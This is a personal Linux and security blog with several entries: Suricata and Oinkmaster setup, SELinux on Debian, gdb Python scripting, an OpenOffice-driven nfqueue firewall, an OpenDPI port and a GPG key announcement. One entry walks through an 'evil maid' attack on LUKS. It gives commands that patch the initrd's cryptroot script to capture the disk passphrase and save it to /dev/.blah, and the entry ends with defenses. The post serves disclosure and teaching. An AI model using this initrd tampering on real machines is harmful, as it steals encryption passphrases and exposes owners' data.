( Pollux's blog )

This blog entry is a mini-howto on the installation and configuration of Suricata with Oinkmaster, on Debian. If you are familiar with the Debian commands it should take no more than five minutes.

It was tested on Debian Sid, but should work for all Debian versions.

Install Suricata

Suricata is in Debian since Squeeze, so a simple:

apt-get install suricata

will do the job.

To work, Suricata needs some rules. The package "snort-rules-default" provides some rules for Snort, but since Suricata is compatible these rules will work.

However, these rules have some problems: they are outdated (and updated only very rarely), and they are not written for Suricata (and cannot use the specific keywords). Emerging Threats provides some rules (both open source and Pro). We will now configure Oinkmaster and Suricata to be able to automatically update the signatures.

Install Oinkmaster

Oinkmaster is a tool to help you manage your signatures. While it is primarily designed for Snort, it also works for Suricata.

If you have installed Suricata using the default configuration, then Oinkmaster should be installed (it is recommended by the package). If not, run:

apt-get install oinkmaster

Edit the configuration file /etc/oinkmaster.conf:

url =  http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz

Create the directory for rules:

mkdir /etc/suricata/rules

Download the rules:

oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules

Now update Suricata's configuration (default for Debian is /etc/suricata/suricata-debian.yaml to match the paths:

classification-file: /etc/suricata/rules/classification.config
reference-config-file: /etc/suricata/rules/reference.config
default-rule-path: /etc/suricata/rules

Now, we need to update the list of rules (adding names of files /etc/suricata/rules/*.rules) in the same configuration file:

rules-files:
 - botcc.rules
 - ...

The rules are organized in files, grouped by categories. If you want to disable some categories, just comment the lines.

If you want to disable only a signature, find its sid (signature id), and add it to /etc/oinkmaster.conf:

disablesid 2011755

On the next oinkmaster update, the corresponding line will automatically be commented in the rules file.

Updating the rules

One nice feature of oinkmaster is the ability to keep the rules up to date very easily. Just run the same command:

oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules

and restart Suricata. Voila !

Some rules are updated very often (compromised hosts, etc.). You can update the rules once a week for example. Creating a cron job is trivial.

Troubleshooting

This is not related to the current blog entry, but also concerns Suricata, especially when trying to load lots of signatures.

I often got a SIGBUS (Bus error) when starting Suricata on a x86 (in a virtual machine like kvm). This seems to be caused by the process running out of memory (for this process Virtual Address space, not for the system) when trying to load lots of signatures, causing memory fragmentation and finally killing the process. So far, the workarounds are the following:

• comment some lines to load less signatures
• rebuild suricata without the PIE/ASLR flags (randomization is enabled by default in the Debian package)
• run suricata on a x86-64 architecture

References

• Suricata Debian Package
• Rule Management with Oinkmaster
• Emerging Threats Open Rulesets

When I installed this server, I have decided to enable SELinux, and run it in enforcing mode. And it works !

Finding relevant documentation for SELinux and Debian was more difficult than expected, and even when it exists, it is often outdated. Also, It does not give real examples, and one problem I encountered very often is a policy module with correct labels, but created for another distribution, and thus not labeling Debian packages correctly. Some other distros (Gentoo and Fedora) have made huge progress on RBAC security, it would be nice to see the same on Debian.

I have started a guide for SELinux on Debian. The goals are to:

• give a practical approach on using SELinux on Debian,
• fight some false ideas (like not being usable on a Desktop, or that you have to enable it globally etc.),
• describe how to mix confined and unconfined services,
• give some examples (Cyrus IMAP, git, redmine, PostgreSQL, etc) see the examples page
• explain how to use it with PaX/Grsec
• give some example on using the
• give some generic hardening tips.

Please notes that the examples and solutions given in the guide are only my own explanations and solutions, and that of course it may be wrong, or you may have a better solution. Since this is intended to be a collaborative guide, please contact me to update the guide, I'll be happy to provide a git account (help wanted !)

For the details, the guide is written in , and rendered (in HTML or PDF) using documentation generator. This allows working with very simple text format (which is diff and git friendly) and having a pretty output.

The details are in the guide. If you find it useful, please give some feedback !

The references are inside, but here's also a list of interesting links on the subject:

• Gentoo SELinux Handbook http://www.gentoo.org/proj/en/hardened/selinux/selinux-handbook.xml
• Red Hat Enterprise Linux SELinux Guide http://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Linux/6/html/Security-Enhanced_Linux/index.html
• Guide to Writing a SELinux policy http://www.linuxtopia.org/online_books/writing_SELinux_policy_guide/index.html
• The UnOfficial SELinux FAQ http://www.crypt.gen.nz/selinux/faq.html
• Russell Cooker’s blog http://etbe.coker.com.au/
• Getting started with SELinux Howto http://www.lurking-grue.org/selinuxHOWTO.html
• Reference Policy API http://oss.tresys.com/docs/refpolicy/api/

Ça fait un certain temps que je n'avais rien posté, alors voici quelques news

Après un peu plus de 4 ans, j'ai décidé de repartir à l'aventure et de quitter EdenWall. C'est surtout l'occasion de remercier tous les gens que j'ai rencontré, avec qui j'ai pu travailler ou échanger quelques blagues (à leur grand désespoir parfois!).

Je remercie toute l'équipe, et en particulier Éric, Jérôme et Loïc pour leurs immenses qualités humaines et professionnelles, ces années ont été autant de fun que de travail intéressant :)

Since version 7.0, gdb has gained the ability to execute Python scripts. This allows to write gdb extensions, commands, or manipulate data in a very easy way. It can also allow to manipulate graphic data (by spawning commands in threads), change the program, or even write a firewall (ahem ..). I'll assume you're familiar with both gdb commands and basic Python scripts.

The first and very basic test is to check a simple command

(gdb) python print "Hello, world !"
Hello, world !

So far so good. Yet, printing hello world won't help us to debug our programs :)

The reference documentation can be found here, but does not really help for really manipulating data. I'll try to give a few examples here.

The Python script

The first thing to do is to write a script (we'll call it gdb-wzdftpd.py) containing the Python commands.

We will define a command to print the Glib's type GList, with nodes and content (which is stored using a void*).

To define a new command, we have to create a new class inherited from gdb.Command. This class has two mandatory methods, __init__ and invoke.

Gdb redirects stdout and stderr to its own printing methods.

__init__

In __init__, we will define the command name, the arguments, and the type of completion that gdb can use (on files, lines, symbols etc). Gdb will automatically use the docstring from the class as the help message for the command.

class PrintGList(gdb.Command):
    """print Glib Glist: wzd_print_glist list objecttype
 
Iterate through the list of nodes in a GList, and display
a human-readable form of the objects."""
    def __init__(self):
        gdb.Command.__init__(self, "wzd_print_glist", gdb.COMMAND_DATA, gdb.COMPLETE_SYMBOL, True)

• Documentation for the gdb.Command class: http://sourceware.org/gdb/onlinedocs/gdb/Commands-In-Python.html#Commands-In-Python

invoke

The invoke function is called when the matching gdb command is called. This is where things become interesting.

    def invoke(self, arg, from_tty):

arg is a string containing all arguments given to the command. Instead of the using split, the documentation recommends to use gdb.string_to_argv:

        arg_list = gdb.string_to_argv(arg)
        if len(arg_list) < 2:
            print "usage: wzd_print_glist list objecttype"
            return

Here, the first argument will be the name of the symbol containing the list, and the second will be the type of the stored data.

Gdb will not allow you to manipulate objects directly (you only know the name), you have to resolve it to a gdb.Value (to get the content). There is a gdb.lookup_symbol function, but it does not seem interesting since it returns a gdb.Symbol, which has no method to get the content !

Let's resolve the list symbol in its value:

l = gdb.parse_and_eval(arg_list[0])

Now that we the list, we have to check that it's indeed a list (only because we're good guys here. If we don't, Python will just throw an exception later ..). The gdb.Type object has a code member, which is an integer and can be used for comparisons. To check the type, we will ask gdb to lookup the type of the Glist object, and since we should have a pointer, call the pointer() function of the result. Then we compare the types:

        if l.type.code != gdb.lookup_type('GList').pointer().code:
            print "%s is not a GList*" % arg_list[0]
            return

And now, the real work can start: printing the list. It's a doubly-linked list, and we have the first element. We just have to iterate and call another method to print the nodes:

        # iterate list and print value
        while l:
            self._print_node(l, t)
            l = l['next']

When a gdb.Symbol points to a C structure, accessing a member (here next) is done using the Python operators.

_print_node

This function will print a basic description of the node (current address, previous and next), and the data.

To print the data, we have to cast it to the correct type: GList stores it in a void * member, which you can't of course dereference. In the invoke function, we resolve the type (to do it once and give the object to the method, instead of resolving it each times):

        try:
            t = gdb.lookup_type(typename)
        except RuntimeError, e:
            print "type %s not found" % arg_list[1]
            return

There is no clean way to get the error, gdb will throw an exception ...

Now that we have the basic type, we again call the pointer method to get the correct type, and use the cast method to convert it. If the conversion can't be done, you'll get an exception.

The we dereference the result and call the standard Python print function on it. For the moment, it will print exactly the same as if you've called the print command in gdb (we'll see later how to change that).

    def _print_node(self, node, typeobject):
        print "Node at %s (prev: %s, next %s)" % (node, node['prev'], node['next'],)
        data = node['data']
        pdata = data.cast( typeobject.pointer() )
        data = pdata.dereference()
        print data

Declaring the command

To finish the script, we just have to create an instance of the class when the script is loaded. Add at the end of the script:

PrintGList()

Loading the script

Inside gdb, loading the script is done as usual with the source command:

(gdb) source gdb-wzdftpd.py

You can also tell gdb to reload automatically sourced files.

(gdb) maint set python auto-load yes

This is very useful when developing, though practically I had to completely exit gdb several times to fix weird behaviors of the commands ...

Testing

In gdb, just call the function with the required arguments:

(gdb) help wzd_print_glist
print Glib Glist: wzd_print_glist list objecttype
 
Iterate through the list of nodes in a GList, and display
a human-readable form of the objects.
...
(gdb) wzd_print_glist list_server_context 'struct context_server_t'
Node at 0x805eb20 (prev: 0x0, next 0x805eb40)
{type = 0, io = 0x806fe80, mode = 0, name = 0x8061850 "srv1", h = 0x806ec80, af_type = 2, host = 0x80619a8 "127.0.0.1", port = 12345, ssl = 0x0, data = 0x0}
Node at 0x805eb40 (prev: 0x805eb20, next 0x805eb50)
{type = 0, io = 0x806ff98, mode = 1, name = 0x8061b08 "srv2", h = 0x806ec80, af_type = 2, host = 0x8061bc8 "*", port = 12346, ssl = 0x80700a0, data = 0x0}
Node at 0x805eb50 (prev: 0x805eb40, next 0x0)
{type = 0, io = 0x8080438, mode = 0, name = 0x807ec90 "srv3", h = 0x806ec80, af_type = 10, host = 0x8061610 "::1", port = 12347, ssl = 0x0, data = 0x0}

Pretty print of the structure

In the precedent example, the structure is pretty simple. When you have many members, embedded structures or unions, pretty-printing the structure will be a nice improvement. Pretty-printing with gdb works in two steps:

• define a class with a to_string method, quite similar to the __repr__ method in Python
• define a function to match the symbol types to match, and return the above class

Printing class

• In the init function, we store a reference on the value to print.
• In the to_string function, we simply get the values and format them

port = self.val['port']
ret = " [%8s] %4s %16s %5d %4s" % (self.val['name'].string(), af_type, self.val['host'].string(), port, mode,)
return ret

Lookup function

The lookup function should look at the symbol attributes (we will use the type), and return the Pretty-Printing class if it matches, or None to tell gdb to continue to search.

def serverctx_lookup_function (val):
    lookup_tag = val.type.tag
    regex = re.compile ("^context_server_t$")
    if regex.match (lookup_tag):
        return ServerCtxPrinter (val)
    return None

Registering the function

The lookup function must be registered in the pretty_printers list. When looking for a pretty-printer, gdb will search in the Objfile of the current program space. If no pretty-printer is found, it will then look in the program space, and if not found, in the global list.
I tried to registered in the current Objfile (using the gdb.current_objfile() function), but it always return None so I used the global namespace ..
The code should be called once, when loading the file, we append it at the end of the file.

def register_printers(objfile):
    gdb.pretty_printers.append(serverctx_lookup_function)

register_printers( gdb.current_objfile () )

Testing

Print the same list:

(gdb) wzd_print_glist list_server_context 'struct context_server_t'
Node at 0x805eb20 (prev: 0x0, next 0x805eb40)
 [    srv1] IPv4        127.0.0.1 12345     
Node at 0x805eb40 (prev: 0x805eb20, next 0x805eb50)
 [    srv2] IPv4                * 12346  TLS
Node at 0x805eb50 (prev: 0x805eb40, next 0x0)
 [    srv3] IPv6              ::1 12347

What's next

Using Python scripts in gdb is really helpful, especially because gdb's internal language does not easily allow to automatize things or make complex manipulations. In this example, we only add a pretty-print function and add a way to iterate a container.

Using scripts, we can create a library of helper functions to print the status of a complex program, run checks on the state of the program etc.

References

• GDB Python API: http://sourceware.org/gdb/onlinedocs/gdb/Python-API.html
• Python-GDB tutorial: http://sourceware.org/gdb/wiki/PythonGdbTutorial
• Debugging with GDB: User Defined Commands in Python: http://www.cinsk.org/wiki/Debugging_with_GDB:_User_Defined_Commands_in_Python
• Source file of the example is attached

I've created a project in redmine for SIEM-live, so there is now a wiki, a tracker, and a repository. I'll add some documentation and instructions on how to build the CD soon.

Contributors would be gladly accepted :)

I've also updated the Git repository for recent versions of live-build, where all variables have been renamed without keeping compatibility :/

The bug where booting with no network (no DHCP, for ex.) made many command fail with a weird error message has been fixed:

could not resolve 127.0.0.1: address family for hostname not supported

For the record, this was caused by .. IPv6 ! Disabling it during the configuration sequence fixes the problem.

• Project page: https://www.wzdftpd.net/redmine/projects/siem-live

Internet ça a du bon. Enfin, pas toujours .. Et en combinant une jolie boulette avec quelques outils, on peut réaliser des choses dont personne n'aurait pensé au début ...

En bref, et notamment pour faire suite au challenge que certaines personnes m'ont lancé au SSTIC 2010 (très bonne année d'ailleurs), le voila: LE pare-feu OpenOffice ! Mais attention: pas un truc codé à l'arrache, nan, un vrai pare-feu avec un design toussa

Donc, comment ça marche:

• on veut filtrer des paquets avec OpenOffice, donc on a besoin d'OpenOffice
• n'ayant pas eu le temps de planifier le portage d'OpenOffice en mode noyau, j'ai donc fait l'inverse: amener les paquets en espace utilisateur avec nfqueue + python
• on manipule OO avec python-uno

Donc, je commence à coder: on crée une feuille calc avec les numéros de ports à filtrer, je récupère la valeur des cellules (et là je peux vous le dire: quand on a l'habitude de LaTeX, OO c'est pas la joie), et on s'en sert pour filtrer les paquets récupérés par nfqueue.

Premier problème: pour utiliser nfqueue, il faut être root. Et faire tourner OpenOffice en root (donc avec une interface graphique) sur le firewall, c'est pas top. Pas de problème ! On va donc séparer les idées, pour pouvoir:

• installer la couche de filtrage (en root) sur le pare-feu
• installer OpenOffice sur le poste de l'administrateur, avec une couche de communication entre les deux.

Donc, le design de la solution (schéma faire avec OO - et surtout du mal - pour pas multiplier les technos):

Pour le serveur XML-RPC, j'ai pris pyUNOserver

Après, il reste à définir le format de la feuille calc. Au départ, je comptais juste utiliser une colonne pour avoir les numéros de port à autoriser, mais quand même on fait un pare-feu qui s'adresse à des décideurs, donc va falloir faire mieux. Donc, idée: on va ajouter des colonnes pour avoir des compteurs de paquets droppés ou acceptés, et on va les mettre à jour en temps réel. Et c'est là qu'on commence à comprendre la vraie puissance du truc (ou pas): on va pouvoir faire des graphes ! Et, bonus point, ils seront remis à jour en temps réel !

Après le bla-blah, les screenshots:

Le prototype original

La version améliorée:

Et donc, le code dans tout ça ?

D'abord, on envoie tout le trafic TCP sortant vers NFQUEUE:

# iptables -A OUTPUT -o eth0 -p tcp -j NFQUEUE

On lance le serveur XML-RPC avec OpenOffice sur le poste de l'admin:

$ ./startPyUnoServer.sh &

Et, sur le pare-feu, on lance le script:

$ sudo python2.6 oowall.py
localhost - - [16/Jun/2010 22:00:37] "POST /RPC2 HTTP/1.0" 200 -
/home/pollux/oowall.ods
...

Et ça marche !

Le code est dispo (j'ai juste copié les fichiers ...) sur: http://www.wzdftpd.net/downloads/oowall/

J'ai fait une video, dispo ici: http://www.wzdftpd.net/downloads/oowall/video_oowall.avi ou sur youtube: http://www.youtube.com/watch?v=pftjkGAORkA

Conclusion

Il fallait faire mieux que le pare-feu météo, là je pense que l'objectif a été atteint. Seule déception: pas avoir pu le faire à temps pour les rumps du SSTIC :/ Maintenant, vous pourrez générer en live des statistiques, des rapports PDF, des présentations, donc la sécurité rejoint enfin le côté user-friendly.

Il y a pas mal d'évolutions possibles, notamment le fait d'utiliser des macros, pouvoir sécuriser la connexion XML-RPC etc.

Pour les performances, c'est tout simplement assez lamentable (ici j'ai ~10 paquets par seconde), mais finalement c'est mieux parce que ça empêchera surtout le peer to peer :)

update: apparemment, j'ai été un peu pessimiste, j'ai réussi à atteindre presque 200 paquets / seconde :)

This month, Joanna Rutkowska implemented the "evil maid" attack against TrueCrypt ^[1].

This kind of attack can be done on any OS with disk encryption: when using whole-disk encryption, you have to infect to bootloader. Linux includes dm-crypt/LUKS, which has some nice features (including TKS1 and working encrypted suspend-to-disk). But how does it play with this attack ?

Sadly, the answer is: pretty bad. LUKS has no protection against this attack, and even requires a /boot partition in clear. Before looking at the possible solutions, we'll play with the /boot partition to see how simple the attack is.

Linux boot sequence basics

The boot sequence (See ^[2]) is the following:

• System startup: the BIOS is loaded, searches for a boot medium, loads the MBR, and yields control to it.
• Boot loader stage 1: the job of the primary boot loader is to find and load the secondary boot loader (stage 2)
• Boot loader stage 2: its jobs is to search and load the Linux kernel and initial RAM disk (initrd) images.
• Linux kernel: it starts by uncompressing itself, then mounts the initrd image. This image contains modules and scripts required to find the root filesystem. After the root fs is found, the kernel switches its / partition (using the pivot_root method) and lets init continue.
• Init: the first task executed.

Hacking the ramdisk (for fun and profit)

While dm-crypt is embedded in the Linux kernel, no solution is offered for Pre-Boot authentication. This means that the Linux and initrd images are stored on a clear partition. The job is then only to edit the initrd image, find a way to capture the passphrase when typed, and store it for later use.

Editing the initrd image

The initrd image is stored in /boot, and is a compressed cpio image:

mkdir tmp
cd tmp
gunzip < ../initrd.img-2.6.30-2-686 |  cpio -i

Early crypto and root partition

(This part was tested on a Debian sid) The initrd image contains a hierarchy of directories:

$ ls
bin  conf  etc  init  lib  sbin  scripts

The interesting file is scripts/local-top/cryptroot. This script searches for the partition to decrypt, uses a secure program to ask the passphrase (aha) in a secure memory location, and calls cryptsetup to decrypt the device. The relevant section is:

if ! crypttarget="$crypttarget" cryptsource="$cryptsource" \
      $cryptkeyscript "$cryptkey" | $cryptcreate --key-file=- ; then
 	message "cryptsetup: cryptsetup failed, bad password or options?"
 	continue
fi

Here are the steps to do:

• display the usual message, to avoid alerting the user:

message -n "$cryptkey"

• read the answer, without echo:

read -s BLAH

• save it for later use. This is a bit more "difficult", since you don't have access to the filesystem at this point, and the root fs is switched anyway after. However, it seems that the /dev partition (especially when using udev) it not remounted ... let's use it:

echo $BLAH >> /dev/.blah

• decrypt the partition as usual. We just have to adapt the decryption line:

if ! crypttarget="$crypttarget" cryptsource="$cryptsource" \
     echo -n "$BLAH" | $cryptcreate --key-file=- ; then

• finally, re-create the initrd image:

find ./ | cpio -H newc -o > initrd.cpio
gzip initrd.cpio
mv initrd.cpio.gz ../initrd.img-2.6.30-2-686

Test it

After a reboot, the boot sequence looks the same as usual and everything goes fine. Maybe except:

# cat /dev/.blah
secret

Next?

See how trivial this was ? The next step could be to get the infection process automatic, or to broadcast the passphrase in mDNS broadcasts or whatever :)

Possible solutions

The real protection is Trusted Platform Module (TPM). It's goal is to have a trusted path for the entire boot sequence (from power on, bios etc. to running OS), However, it raises concerns about its potential uses, especially for antitrust respect (Palladium?) or for the money-vampires of RIAA and friends (DRM?).

To protect against these attacks, the most basic protections can be pretty efficient (assuming you don't need a military-grade protection):

• Set a password on your Bios, to avoid booting on USB, for ex.
• Ensure the box can't be opened
• Set (another) password on the bootloader, so people won't add init=/bin/bash
• When encrypting your disks, don't forget the swap !
• Always mount /boot as read-only, run a checksumming program like aide to detect modifications.
• Don't forget the basics: set up good passwords, change them regularly, store them with a correct hash ^[3], always lock your screen, etc.

These suggestions won't cost you additional hardware, are pretty easy to do, and will at least raise your security by slowing down intrusions (which now requires to find a way to boot), and detect them easily (changed file, computer rebooted unexpectedly or opened etc.). And anyway, if someone has (physical) access to your computer for a good period of time, it's over ;)

Have fun !

So, Ipoque has published its deep inspection engine under a free license (LGPLv3): OpenDPI This is always good news when a company decides to release source code to the community, so first of all thanks to Ipoque for this.

After downloading the source code on OpenDPI google project's page, I started to look at it.

Basically, the project looks quite unprepared for release (only a Makefile, no configure script - though no-one can be blamed for not using autotools -), but after looking at the code it seems not so bad:

• the code is reasonably clean
• it builds fine on x86 or x86_64 platforms
• the code is provided with a decent list of identified protocols
• the demo uses pcap files

There are a few minor annoyances:

• the provided lib is a static lib ... building a shared library would be better !
• the build system is pretty awful, rebuilding everything each time, without using deps, no install system etc.
• no docs (looking at the demo file was sufficient to understand most of the function).
• no correct website, forums or whatever. I'm sure it will get better in the future
• pcap only

This last point was the most annoying to me, so I decided to rewrite a daemon using the NFQUEUE target. While I could have used the nfqueue-bindings, I decided to use C this time: it was simpler ! I only had to recode the open/close/runloop functions to use nfqueue, extract the packet from the nfqueue callback, and use the exact same callback as for pcap :)

Here is the relevant parts of the interesting code:

static int _nfq_cb(struct nfq_q_handle *qh,
		    	 struct nfgenmsg *nfmsg,
			 struct nfq_data *nfad, void *data)
{
       [...]
	struct nfqnl_msg_packet_hdr *ph = nfq_get_msg_packet_hdr(nfad);

	if (ph)
		id = ntohl(ph->packet_id);

	payload_len = nfq_get_payload(nfad, &payload);
	iph = (struct iphdr*)payload;

	ret = nfq_get_timestamp(nfad, &tv);
	time =
		((uint64_t) tv.tv_sec) * detection_tick_resolution +
		tv.tv_usec / (1000000 / detection_tick_resolution);

	// process the packet
	packet_processing(time, iph, payload_len, payload_len);

	nfq_set_verdict(qh, id, NF_ACCEPT, 0, NULL);

	return 0;
 }

The proof-of-concept code works fine. As seen on this discussion, maybe Ipoque folks would be interested in a contribution :D No netfilter integration is needed, just playing with nfqueue + mark for filtering should be enough for most cases.

The code is not yet published, because it doesn't do anything useful yet (just try to identify and follow protocols and flows). If you're interested, contact me (remove the _ signs).

I've just created a LinkedIn group for Prelude IDS.

All Prelude users are welcome to join the Prelude IDS group to stay in touch with other Prelude users, use the forums, get news etc.

Partly because of the latest theoretical attack against the SHA-1 digest algorithm (details), I created a new GPG key:

sec   4096R/F1393998 2009-05-10
uid                  Pierre Chifflier <chifflier@gmail.com>
uid                  Pierre Chifflier <chifflier@inl.fr>
uid                  Pierre Chifflier <pollux@debian.org>
uid                  pollux <pollux@wzdftpd.net>
uid                  Pierre Chifflier <chifflier@cpe.fr>

It's signed with my old key 0x8D5F40CB, uploaded to keyservers, and will replace my old key.